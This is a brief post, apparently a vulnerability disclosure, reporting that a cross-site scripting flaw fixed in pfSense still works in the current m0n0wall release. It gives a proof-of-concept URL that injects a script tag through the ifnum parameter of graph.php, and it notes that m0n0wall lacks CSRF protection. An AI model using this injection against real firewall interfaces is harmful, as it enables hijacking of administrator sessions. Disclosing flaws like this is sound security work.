I don't know if this is fixed in the monowall repository but it was in pfsense.
This xss still works against monowall (in the current release).
http://10.0.20.12/graph.php?ifnum=re/%3E%3Cscript%3Ealert%281%29;%3C/script%3Exxxx0&ifname=LANAlso, monowall has no csrf protection.